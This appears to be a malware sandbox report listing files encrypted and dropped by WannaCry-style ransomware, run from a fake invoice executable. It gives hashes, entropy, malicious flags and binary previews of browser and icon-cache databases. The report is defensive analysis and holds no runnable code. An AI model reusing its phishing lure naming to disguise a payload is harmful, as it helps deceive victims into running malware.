                                                          Preview:WANACRY!....T.d...h.8..E.v,~.3l.i.4h\.i.W....(...(....L.k.j.VU...>.&.r..`..{e.;.'`.<.>..q....(..vR..B".&.....V.L.\.d.?........Q..*z\^\...*2P.h..b..Oi.+#...+].&..[2...Tc>..{.4.Z..|]..........7J..".\~..p....}..}. F--...........:.P..E.9..!..z.....t..`..)............bw.......T...sz...g.~...A?....G\Oa.....3D.....V...N.....M.....o..a.t8.F..U6.k.5....z.}.%5`.j.....AF..2].Oz_O.,..S..7..a.p...w.b.>n.....B......Dh.....}7...1@.r...H.I].Rw$....$...@P....}`.;..pj7 ......t}....CU&..!jr....\.'l]..E_.......+..f....^/.....oxG...].s...*.....0.;.v.."..9..H...1`a8...&..'s.r.r..L.....WcGw'.H....KJ..g....N."o.{.Q.m{.<..k.q..b..k\2.x}..n.V.u..i..x.;FE..o.D<.. !*<.B.z...,..o.k a....(.q&....S.K..>....K..v....b36.r.....[dw^C.R.8[.K.....k*.o#.k"..U..i...fA.`.D...p~...0..7F.w..rc.[...4.v...,......P.:....4.u...1.Y......95h>.n...Cn..?)eo.rN.......Q.Vrb....o.....%)?z*0..ubIb........zT.u.qQ:..V!g....&T...X.]..c,q_.qS. ?....v.S%u.#.L.[.)G.....*".px.w..-R...-.......

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):28952
                                                          Entropy (8bit):7.994042048695636
                                                          Encrypted:true
                                                          SSDEEP:768:lzlo2Swrska2zJAGr4sa02xUKl2Sf+yLjIX9VObqPze8Q:l5W2zJA8TAZ2SfcXvPzeT
                                                          MD5:7C52A93C2BC9237A5F192975C7F0C725
                                                          SHA1:68F8B3BA1A8A6646A134479151E6B47B150013D6
                                                          SHA-256:F494DBF426241379E491F233EB85C98042379E44A51B76F209416357CD5239BC
                                                          SHA-512:BEA750C73E71C7CCD006DC5F4BE6B299DDE6D0A818FA67B0AEE6700DD3206C46B2109DA3FD6C0B5C53C8F49326B14D266B6CCFA436D46A0963EE525A987B3E71
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....9....^.Sl.dSH.%..?p.Z..}xM...b(._Y...0Dx.sS.$M..tW..........@I..7w).V/........(:.,..G.8.....@.q.f.U..'...z.l3...........<..d.+....:.4R.9...]..)wP1.c'.=.T......G...y.....^.M..,.<o.g.m..Z.mx..M. o.....\3....&..7...@.$-....>..d.j[.R...Y{&....]......p........j..&.......C6...v4o..z......n....CQ.(_......+X.u..[Ca......{..../...o.'.....&....9d..>iLc..4..&A..'........{.N.O...L...0.T...#S...TW....%.!.j.J-5D>a.Z.,.*?.b..zn...n..4..-.........kIx.1u0..y..U..!..F...oW.P..].X......T./W0....U7......k..3a_..)...p-.Z>.=1.S..`a.:F..(.X.)s....g.2TZ..Cu:Q.....\.'....N.,.`:DPj.;6..v.W=A'2:.^..@..wY.Wu........B..P.$.....n.T.'..."V..OMV.zlk.....*7"?1'%...>..?...y.D9)..;|..B..b.zz...XX.A.U.w..,..UZ....p...T..E-..x.....Z.j...Sz.T.g....S.%T.j....,..z.`.H6......7E.A.GR..V...Y.aa`.l....-....=.]j.2.$-......r..x@.o.HN.F2O.1R0....e0Z..~....=Wg.Z.]..J.(..*.&..I.....Uk..AX%v...\...Z..C..........p......@....$......[..x...R.|.(...9.&K.rQ..)...S..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases\Databases.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):28952
                                                          Entropy (8bit):7.994042048695636
                                                          Encrypted:true
                                                          SSDEEP:768:lzlo2Swrska2zJAGr4sa02xUKl2Sf+yLjIX9VObqPze8Q:l5W2zJA8TAZ2SfcXvPzeT
                                                          MD5:7C52A93C2BC9237A5F192975C7F0C725
                                                          SHA1:68F8B3BA1A8A6646A134479151E6B47B150013D6
                                                          SHA-256:F494DBF426241379E491F233EB85C98042379E44A51B76F209416357CD5239BC
                                                          SHA-512:BEA750C73E71C7CCD006DC5F4BE6B299DDE6D0A818FA67B0AEE6700DD3206C46B2109DA3FD6C0B5C53C8F49326B14D266B6CCFA436D46A0963EE525A987B3E71
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....9....^.Sl.dSH.%..?p.Z..}xM...b(._Y...0Dx.sS.$M..tW..........@I..7w).V/........(:.,..G.8.....@.q.f.U..'...z.l3...........<..d.+....:.4R.9...]..)wP1.c'.=.T......G...y.....^.M..,.<o.g.m..Z.mx..M. o.....\3....&..7...@.$-....>..d.j[.R...Y{&....]......p........j..&.......C6...v4o..z......n....CQ.(_......+X.u..[Ca......{..../...o.'.....&....9d..>iLc..4..&A..'........{.N.O...L...0.T...#S...TW....%.!.j.J-5D>a.Z.,.*?.b..zn...n..4..-.........kIx.1u0..y..U..!..F...oW.P..].X......T./W0....U7......k..3a_..)...p-.Z>.=1.S..`a.:F..(.X.)s....g.2TZ..Cu:Q.....\.'....N.,.`:DPj.;6..v.W=A'2:.^..@..wY.Wu........B..P.$.....n.T.'..."V..OMV.zlk.....*7"?1'%...>..?...y.D9)..;|..B..b.zz...XX.A.U.w..,..UZ....p...T..E-..x.....Z.j...Sz.T.g....S.%T.j....,..z.`.H6......7E.A.GR..V...Y.aa`.l....-....=.]j.2.$-......r..x@.o.HN.F2O.1R0....e0Z..~....=Wg.Z.]..J.(..*.&..I.....Uk..AX%v...\...Z..C..........p......@....$......[..x...R.|.(...9.&K.rQ..)...S..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.98769280462868
                                                          Encrypted:false
                                                          SSDEEP:384:puiTadUO4zrCFQ1uWhLShA1ryDKL3aLAL9+LUeQYsmaBhTyNe:8iwUOYelWhGaIDQqkLQQYsmISe
                                                          MD5:506DFAE5AE58648A23DB500E0B9AD342
                                                          SHA1:86C218CD98B1050C25902AC874DA8098932222C5
                                                          SHA-256:B76A7093BE9000548C5A0249AA73738CD097FFB291B41DA446D3C227BC8BBACC
                                                          SHA-512:2068FCF0C84FBF65A6F4B32649581C9D4DF389ED3CC05B1C6CE2481FC917FF6974306F7A456A5990D2C13A0E9641340A67CEAF515D558FB925E00694D74A5BD2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......9....."0..E...].....n9..W.`l.1.U...)...I5}.R....jc@_..2.y|.(6.Z.Nv..\..}.Y.......L....x.Q.....\~.......1:......>p.g:s./#(.B..u.B.jy..+......N.8.k...!.X{..I.Q..+.c.......?.^.....8...8a.7R`.6..,8)$."......U.X...VZX.,,..Jj...8..m&..#..Z...Q.U.....@........3....].<yY....p_.k....~..^...WQ.6..iUM.m&'u`#..t..hT2...[..>..p..8.x..t..>....QP8....g1..37......0..cf.74a.f{.'.W,)i......j.G.....R..5ob..z..E>A...]D...^....>.oF\.....c,.M................IY7>I...O.J..~2.@.$./.C3k..Zs...vXt....n.J.A.......y...c...9.+..z......j.....2.0eT}I.....8dU.......zT.66B.\..1..d4..j..p...y..o..tA.}.1...Z+XKk_M...}..KY..L........,.........M%\.\}/O.,....d...+>..h.|[&qO:l.p...'|.~.$We...NKs....T..;9hc........,-.$V{..U....!.u.~.W.D..G..._..[0Y3....a1ZI..,..u._;.y5....m.......0.....f.h..Mk.1...#..9v..=..@H0G.....I.$d.o6.:t....6.B..!.....$..b.U..aS..nh..I..x...>Dw...a...u..N..2ck|.:Y...4*];{.Z[.KY6..*...O....j'.0.z...=D...W%9..6.U.c..-.J;...&E<n.iS..`.CU..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):16664
                                                          Entropy (8bit):7.98769280462868
                                                          Encrypted:false
                                                          SSDEEP:384:puiTadUO4zrCFQ1uWhLShA1ryDKL3aLAL9+LUeQYsmaBhTyNe:8iwUOYelWhGaIDQqkLQQYsmISe
                                                          MD5:506DFAE5AE58648A23DB500E0B9AD342
                                                          SHA1:86C218CD98B1050C25902AC874DA8098932222C5
                                                          SHA-256:B76A7093BE9000548C5A0249AA73738CD097FFB291B41DA446D3C227BC8BBACC
                                                          SHA-512:2068FCF0C84FBF65A6F4B32649581C9D4DF389ED3CC05B1C6CE2481FC917FF6974306F7A456A5990D2C13A0E9641340A67CEAF515D558FB925E00694D74A5BD2
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!.......9....."0..E...].....n9..W.`l.1.U...)...I5}.R....jc@_..2.y|.(6.Z.Nv..\..}.Y.......L....x.Q.....\~.......1:......>p.g:s./#(.B..u.B.jy..+......N.8.k...!.X{..I.Q..+.c.......?.^.....8...8a.7R`.6..,8)$."......U.X...VZX.,,..Jj...8..m&..#..Z...Q.U.....@........3....].<yY....p_.k....~..^...WQ.6..iUM.m&'u`#..t..hT2...[..>..p..8.x..t..>....QP8....g1..37......0..cf.74a.f{.'.W,)i......j.G.....R..5ob..z..E>A...]D...^....>.oF\.....c,.M................IY7>I...O.J..~2.@.$./.C3k..Zs...vXt....n.J.A.......y...c...9.+..z......j.....2.0eT}I.....8dU.......zT.66B.\..1..d4..j..p...y..o..tA.}.1...Z+XKk_M...}..KY..L........,.........M%\.\}/O.,....d...+>..h.|[&qO:l.p...'|.~.$We...NKs....T..;9hc........,-.$V{..U....!.u.~.W.D..G..._..[0Y3....a1ZI..,..u._;.y5....m.......0.....f.h..Mk.1...#..9v..=..@H0G.....I.$d.o6.:t....6.B..!.....$..b.U..aS..nh..I..x...>Dw...a...u..N..2ck|.:Y...4*];{.Z[.KY6..*...O....j'.0.z...=D...W%9..6.U.c..-.J;...&E<n.iS..`.CU..

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):49432
                                                          Entropy (8bit):7.9963226139739705
                                                          Encrypted:true
                                                          SSDEEP:768:rpfKmDGqw9lvhwkoMEObt8/uh1gdoBhpV+mPnFCkIX+A2DKP3bZNAYaSL6TR6ec4:EmDGqW5okJUuvg07PncXJbLpeIed7
                                                          MD5:522BDBB080EFE803D07274FFA0ED1C68
                                                          SHA1:AA5A96A6F955DB0A090E9327274F05CB1EAB88EA
                                                          SHA-256:FE2DF85BC924327ADCEBB35CF49931AA724ADF778FC9C51123C9FCB9CEA454F4
                                                          SHA-512:60D495F9FA2638D0AF5D4B47283AD479360E126A42CF379106C29DFF5D837DF4A9E2BCBE3A552949655BFDC2EC6774AF4DC9C4A28CFF71FCF7EEBDDBE7911DF0
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........<.ny.....5.`]4..........\6:....Qb*..l.....l-~.8.Q.....>..z..g%\..u.r_.hmu@.......%..'..oW..Q8.....'.I..qM..C.....R.....=.)..v..xu.|...ep...\..cD.}.d...u..u..-Q).lV.c....._.Xo...Eac.,.k7]........[.].%.j./.G......n-.G7p..|...L.<..............Eua..,...........)..2.)`.rN?....86...YH..d.^.".f/...$..i.1.?...c........:9qj.Q7.........gX..3..$...g-....\.^.SKoV.S.G6rr..J.j.F.`....#...<]-....R.....V..q........A..n%.K`..+....}...=...:1.R...ci...~@/....}.P...%.c...<.x...Id........y..?ah3.=.-........>..i........*....y.i.IL$...U..a..t.&X..|PaVs<..d......=.?.3h&..7......@...,-.%.]^.......4Q..}.c....[....W..E.....QK..\2.)Q4n].4.a.c.-]B..r...C.*...*..m.h....~.`.ll..."..aP....a.x..._....~o.G#_......`K.x.....o..#...{\Sd.....$."..\t....\..".f.j36H..?^?9...F...D...G..H......}..&]p....e....oL...)%..T{v8.gm%k..).....|xl.&n\@E#.5...,........+B[x7....W.3..&.+.)q.2......ZI....x:I..7mz5...Gz..z.q..g..`W.~...G..Z...[3.I_..4..B...i=...o...

                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\first_party_sets.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):49432
                                                          Entropy (8bit):7.9963226139739705
                                                          Encrypted:true
                                                          SSDEEP:768:rpfKmDGqw9lvhwkoMEObt8/uh1gdoBhpV+mPnFCkIX+A2DKP3bZNAYaSL6TR6ec4:EmDGqW5okJUuvg07PncXJbLpeIed7
                                                          MD5:522BDBB080EFE803D07274FFA0ED1C68
                                                          SHA1:AA5A96A6F955DB0A090E9327274F05CB1EAB88EA
                                                          SHA-256:FE2DF85BC924327ADCEBB35CF49931AA724ADF778FC9C51123C9FCB9CEA454F4
                                                          SHA-512:60D495F9FA2638D0AF5D4B47283AD479360E126A42CF379106C29DFF5D837DF4A9E2BCBE3A552949655BFDC2EC6774AF4DC9C4A28CFF71FCF7EEBDDBE7911DF0
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!........<.ny.....5.`]4..........\6:....Qb*..l.....l-~.8.Q.....>..z..g%\..u.r_.hmu@.......%..'..oW..Q8.....'.I..qM..C.....R.....=.)..v..xu.|...ep...\..cD.}.d...u..u..-Q).lV.c....._.Xo...Eac.,.k7]........[.].%.j./.G......n-.G7p..|...L.<..............Eua..,...........)..2.)`.rN?....86...YH..d.^.".f/...$..i.1.?...c........:9qj.Q7.........gX..3..$...g-....\.^.SKoV.S.G6rr..J.j.F.`....#...<]-....R.....V..q........A..n%.K`..+....}...=...:1.R...ci...~@/....}.P...%.c...<.x...Id........y..?ah3.=.-........>..i........*....y.i.IL$...U..a..t.&X..|PaVs<..d......=.?.3h&..7......@...,-.%.]^.......4Q..}.c....[....W..E.....QK..\2.)Q4n].4.a.c.-]B..r...C.*...*..m.h....~.`.ll..."..aP....a.x..._....~o.G#_......`K.x.....o..#...{\Sd.....$."..\t....\..".f.j36H..?^?9...F...D...G..H......}..&]p....e....oL...)%..T{v8.gm%k..).....|xl.&n\@E#.5...,........+B[x7....W.3..&.+.)q.2......ZI....x:I..7mz5...Gz..z.q..g..`W.~...G..Z...[3.I_..4..B...i=...o...

                                                          C:\Users\user\AppData\Local\IconCache.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11496
                                                          Entropy (8bit):7.985162998497414
                                                          Encrypted:false
                                                          SSDEEP:192:UhMCPzLTM4dP99Mv8FIKsNEl00z4pJsu9drNd12bEhvLNiAHUvTL:vQ0+988mKsNEl9z4pFdrJ2bEhvLNiAHG
                                                          MD5:F9723A700F656364F1C9AC4CC09B2F53
                                                          SHA1:2093F11F9E1B7FC6CE3D1F9315DCEFE67499A8AB
                                                          SHA-256:432EC81E15ECA1B7A56BD183BAF5E2D44DEE0AE458FFC28DD3C173DB783A0FA5
                                                          SHA-512:59BF8F10A196D353F173DB23D69B017EE2252AE6EBE7915F185DAA6EA4AFBAE5EF4D88C670DDEF34CBD9A838226E43AA7973961D5E19B77A2C0851F640F92067
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g.l.4qc..=F....?t.....W3....:.yA"f..>......u.-..D[1....If......"\~5g........G..."*a.n....5.q>:.c.2t..i.q.....5..P..1cg....s...B..H....:...K...].M..3..."3...{Y.....Q'.<...[...ba.Y..xZ...{xEt..,M..MWSO.O?....!t. <H-.&A.e.0.0.b......C.|=bQ....}.D..w.....+..........2S.&........."d._4.w..f...5XJ.7|...>xd`v...q...4.ZX.....3...R..g.[.....Bh....,.m..A..j..i5.f.q........{.....1..3A..1....7..U..\.zA.*..sH.l..R`......,m........s.....1....fA..&....n&..3I...r.f...S`.e.h...?B.a,......OV.M....VF...c;=..d7Q.L.....Pa..._^T.LP&.u<4.t..."c;N.O..J.F$-z.....^oIb:J5^-..].\...I..9..V^.*....'?..hy...>.{....E.S...x.s...6....o....@.B$~....$;..xH.........]......<...C....3.I4<u.r%b^v..<.....[.wt..@1..d.K..M.f........Sa5lr3.9.J.81!....aK....-..W..D.Zg...|@...F..J...Y.Oto.....Q{S..l....`&..T..$.....#Q....G.g.R..7......r....x.@.q.l.(<M..3hq.d......I..r(O..1y..}..a.....J..... ..v..p..X.@...*.&|.gbC.D.9..<.....V.T...D7z..&.......U.tb..Y...p05....21-.....Z..AY.

                                                          C:\Users\user\AppData\Local\IconCache.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):11496
                                                          Entropy (8bit):7.985162998497414
                                                          Encrypted:false
                                                          SSDEEP:192:UhMCPzLTM4dP99Mv8FIKsNEl00z4pJsu9drNd12bEhvLNiAHUvTL:vQ0+988mKsNEl9z4pFdrJ2bEhvLNiAHG
                                                          MD5:F9723A700F656364F1C9AC4CC09B2F53
                                                          SHA1:2093F11F9E1B7FC6CE3D1F9315DCEFE67499A8AB
                                                          SHA-256:432EC81E15ECA1B7A56BD183BAF5E2D44DEE0AE458FFC28DD3C173DB783A0FA5
                                                          SHA-512:59BF8F10A196D353F173DB23D69B017EE2252AE6EBE7915F185DAA6EA4AFBAE5EF4D88C670DDEF34CBD9A838226E43AA7973961D5E19B77A2C0851F640F92067
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!....g.l.4qc..=F....?t.....W3....:.yA"f..>......u.-..D[1....If......"\~5g........G..."*a.n....5.q>:.c.2t..i.q.....5..P..1cg....s...B..H....:...K...].M..3..."3...{Y.....Q'.<...[...ba.Y..xZ...{xEt..,M..MWSO.O?....!t. <H-.&A.e.0.0.b......C.|=bQ....}.D..w.....+..........2S.&........."d._4.w..f...5XJ.7|...>xd`v...q...4.ZX.....3...R..g.[.....Bh....,.m..A..j..i5.f.q........{.....1..3A..1....7..U..\.zA.*..sH.l..R`......,m........s.....1....fA..&....n&..3I...r.f...S`.e.h...?B.a,......OV.M....VF...c;=..d7Q.L.....Pa..._^T.LP&.u<4.t..."c;N.O..J.F$-z.....^oIb:J5^-..].\...I..9..V^.*....'?..hy...>.{....E.S...x.s...6....o....@.B$~....$;..xH.........]......<...C....3.I4<u.r%b^v..<.....[.wt..@1..d.K..M.f........Sa5lr3.9.J.81!....aK....-..W..D.Zg...|@...F..J...Y.Oto.....Q{S..l....`&..T..$.....#Q....G.g.R..7......r....x.@.q.l.(<M..3hq.d......I..r(O..1y..}..a.....J..... ..v..p..X.@...*.&|.gbC.D.9..<.....V.T...D7z..&.......U.tb..Y...p05....21-.....Z..AY.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):33048
                                                          Entropy (8bit):7.994197773676238
                                                          Encrypted:true
                                                          SSDEEP:768:0CMA+P2VDj6+zH9sj32rezL+P7TtROKkJ:0COGDGUGj3bL+Cv
                                                          MD5:50B47D3B60B79E8AEB0F7839040E7048
                                                          SHA1:0500BF0AEDA3D3944F606F66EFDFFDEEA69D47D9
                                                          SHA-256:17465DBD76818F51A563D970BC3ECB18CCAD989CB6E9A022397A42936973EACC
                                                          SHA-512:46D992691D5F807DD928D051218A3572DDF79E007F4F94B739787B3528F53C5EE9AA2BA71830D2B4639244EEAD44B0D16CC653F8156D912D2B4A1D677EB429DF
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....[....F.x....<.E...".c..z...J>...3.fNj..../Si..i.{X...V...>...._wp}.....F.,.,<`..l.....Ze?.Rg..'..-...[..a.~..:........O..~B..^=3.e[+....r%....-.;$..~...%>.%.7|h..].|..,4..5...B..B..=.....".88....=.a..}....w...H.+..%(.......)..o..'x...JF[.q..............;<}..ik.....c......D.y.&....O.....H]..R.n..b.. ...=;:.g....%..P../.,.W.[e.@R..%.?j..Vy.05n.l.V.Q.......).....|......r......M..J4...e.Yc.t.$..Sn.l.W^.$.....c.....F..K...#3..g.G....}...@M..-c_....q4.p..P..`..M..0...Q.`.A.x"j....x..0PH.v..._..b.@.d3....Y.).W..2.3$.....63u.h......fYx..^......z....qh..wu.pG.6............k.C.XO.'.PK.@3.....l.\j6....0.w.e..v,I.~/..%.. .xJ<...I-K...Vz...xn.J...B..C..?..S......~..C.6.;+N+..l...!E...g.&...vut...Kw..}.Z.......-;....n.G<...xZ...\i..1hO...(H.=...@.MM...#T:..TR.....Z.lG.....h.I;z..l........#...t.....fs..3...$R..y..........s.....h:....)...S.>...Km... =.1.m#..7...3#"(L..Y..G.B...+.qN..D.].'.I.....~...&,.pg..BJn..s...m}y/W.ey.IYV.M..M!....)e.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeEDrop\EdgeEDropSQLite.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):33048
                                                          Entropy (8bit):7.994197773676238
                                                          Encrypted:true
                                                          SSDEEP:768:0CMA+P2VDj6+zH9sj32rezL+P7TtROKkJ:0COGDGUGj3bL+Cv
                                                          MD5:50B47D3B60B79E8AEB0F7839040E7048
                                                          SHA1:0500BF0AEDA3D3944F606F66EFDFFDEEA69D47D9
                                                          SHA-256:17465DBD76818F51A563D970BC3ECB18CCAD989CB6E9A022397A42936973EACC
                                                          SHA-512:46D992691D5F807DD928D051218A3572DDF79E007F4F94B739787B3528F53C5EE9AA2BA71830D2B4639244EEAD44B0D16CC653F8156D912D2B4A1D677EB429DF
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!....[....F.x....<.E...".c..z...J>...3.fNj..../Si..i.{X...V...>...._wp}.....F.,.,<`..l.....Ze?.Rg..'..-...[..a.~..:........O..~B..^=3.e[+....r%....-.;$..~...%>.%.7|h..].|..,4..5...B..B..=.....".88....=.a..}....w...H.+..%(.......)..o..'x...JF[.q..............;<}..ik.....c......D.y.&....O.....H]..R.n..b.. ...=;:.g....%..P../.,.W.[e.@R..%.?j..Vy.05n.l.V.Q.......).....|......r......M..J4...e.Yc.t.$..Sn.l.W^.$.....c.....F..K...#3..g.G....}...@M..-c_....q4.p..P..`..M..0...Q.`.A.x"j....x..0PH.v..._..b.@.d3....Y.).W..2.3$.....63u.h......fYx..^......z....qh..wu.pG.6............k.C.XO.'.PK.@3.....l.\j6....0.w.e..v,I.~/..%.. .xJ<...I-K...Vz...xn.J...B..C..?..S......~..C.6.;+N+..l...!E...g.&...vut...Kw..}.Z.......-;....n.G<...xZ...\i..1hO...(H.=...@.MM...#T:..TR.....Z.lG.....h.I;z..l........#...t.....fs..3...$R..y..........s.....h:....)...S.>...Km... =.1.m#..7...3#"(L..Y..G.B...+.qN..D.].'.I.....~...&,.pg..BJn..s...m}y/W.ey.IYV.M..M!....)e.

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20760
                                                          Entropy (8bit):7.991080074112121
                                                          Encrypted:true
                                                          SSDEEP:384:m0mX2MCaI4oxcQuq3vONwJmbHafFmxnsPHzFQBUZExknTcfr4H2tbi0B28:RTM/QuSJmbHfxnsPT+uznTczmY7
                                                          MD5:9317807F6A2CAF383F24706EC53F6133
                                                          SHA1:3A4B255C33BD6ED998BA0315FAA87EBCE92775EF
                                                          SHA-256:7C4C5CF1E7310B1B70D2432D683B32BE6BB29813FE6E247E924DC392C469C8AC
                                                          SHA-512:24ACCF020E72B49BBB3FF672672965CC1A8F11C12E755C4E85D06C8086AE310B394759FE09DCDF7D46FDB779B9BB4339F458A6FA29F0C6BEC9A2C7FC4C25BA40
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........V..V$-......qk[...G..m.8..+..IV.1;.....S......d>F..{D.%..P.`f....&....zB..H..L 8p.....Q=.=......-.. ?a.-Z......<xt.../..E.|.+....Q.pU.+/.}X..+...Oo)......^..-H....a(.>../._....m...RL..ukR..=..J,.a.?<..fD&..g.7.....#$.7tQ....@<4.pb..I....|R.O.....P......(.....}v...R.X..[.kPa.F.:!....f..U.^..Q.KV.(1.....x.\..T_6.h............7BR..LY*.._...{/..b.i...\e&Y............^..n-.G.n...W...?. ~W....t=Q.....N...&.....8PB.j_...L.Dzu._Mz..VG}..j...r......>.....L0......sf?".dk...t..m7....r...}i.(*..3..t$....zY.Y9I....\(.X6.....x.M.;.|.K.K.$..GMT9[..$.....Q...i..m...}..qX#.....;k.g....L..n..V3.6..j..D....e..S.S..."2yS;e....i..pi.I......7.@..Q^.c..a..'o..g.b.....<.$...!....m...51....=./<..g....jT..Zb......d.o..M.T&.}..Tqr.m.s.A.fT.."...Gb..`.....b!.....c....R/W).VK..P...M.N.. ....vD.(X.UJz...../.E.E..l...._...y.\g1o....} .7.\......5 ....k..mg..&.x..s.......w._Q.t~....|.Q|C.Z....D)I*.E..". ..y..,..@v~-...zk..yN..X.F....l...g.'_+c..=\$..k^.C.[

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeHubAppUsage\EdgeHubAppUsageSQLite.db.WNCRYT

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):20760
                                                          Entropy (8bit):7.991080074112121
                                                          Encrypted:true
                                                          SSDEEP:384:m0mX2MCaI4oxcQuq3vONwJmbHafFmxnsPHzFQBUZExknTcfr4H2tbi0B28:RTM/QuSJmbHfxnsPT+uznTczmY7
                                                          MD5:9317807F6A2CAF383F24706EC53F6133
                                                          SHA1:3A4B255C33BD6ED998BA0315FAA87EBCE92775EF
                                                          SHA-256:7C4C5CF1E7310B1B70D2432D683B32BE6BB29813FE6E247E924DC392C469C8AC
                                                          SHA-512:24ACCF020E72B49BBB3FF672672965CC1A8F11C12E755C4E85D06C8086AE310B394759FE09DCDF7D46FDB779B9BB4339F458A6FA29F0C6BEC9A2C7FC4C25BA40
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Preview:WANACRY!..........V..V$-......qk[...G..m.8..+..IV.1;.....S......d>F..{D.%..P.`f....&....zB..H..L 8p.....Q=.=......-.. ?a.-Z......<xt.../..E.|.+....Q.pU.+/.}X..+...Oo)......^..-H....a(.>../._....m...RL..ukR..=..J,.a.?<..fD&..g.7.....#$.7tQ....@<4.pb..I....|R.O.....P......(.....}v...R.X..[.kPa.F.:!....f..U.^..Q.KV.(1.....x.\..T_6.h............7BR..LY*.._...{/..b.i...\e&Y............^..n-.G.n...W...?. ~W....t=Q.....N...&.....8PB.j_...L.Dzu._Mz..VG}..j...r......>.....L0......sf?".dk...t..m7....r...}i.(*..3..t$....zY.Y9I....\(.X6.....x.M.;.|.K.K.$..GMT9[..$.....Q...i..m...}..qX#.....;k.g....L..n..V3.6..j..D....e..S.S..."2yS;e....i..pi.I......7.@..Q^.c..a..'o..g.b.....<.$...!....m...51....=./<..g....jT..Zb......d.o..M.T&.}..Tqr.m.s.A.fT.."...Gb..`.....b!.....c....R/W).VK..P...M.N.. ....vD.(X.UJz...../.E.E..l...._...y.\g1o....} .7.\......5 ....k..mg..&.x..s.......w._Q.t~....|.Q|C.Z....D)I*.E..". ..y..,..@v~-...zk..yN..X.F....l...g.'_+c..=\$..k^.C.[

                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\128.png.WNCRY (copy)

                                                          Download File
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):5272
                                                          Entropy (8bit):7.961358534276766
                                                          Encrypted:false
                                                          SSDEEP:96:otV9duki3dqJZCAPapLbt2wuKo6yOLIC5PSgbR8grhRfA8Bp0mGpOVhpaC:ii3dqyAiZbtluHpyPSkfx1GpO7D
                                                          MD5:C8AE88A3B27897C1715BCEDEEA9073FB
                                                          SHA1:C4AB1EFEA4550A1444947C050CB4C8C44745AAD3
                                                          SHA-256:02A9299051AB0439A58E5B078EE827FF83686A4A6C42DFD1397FB451FA133C26
                                                          SHA-512:4B3A4ED8A358F647014D8FA901FF72D8BFE3ED6C1E43877D072355E784D0D7BFC85579D46C81AF2F2BB61F826F99A2ACEC682B5F5429B2F70C68CDEA7F926288
                                                          Malicious:false
                                                          Reputation:unknown
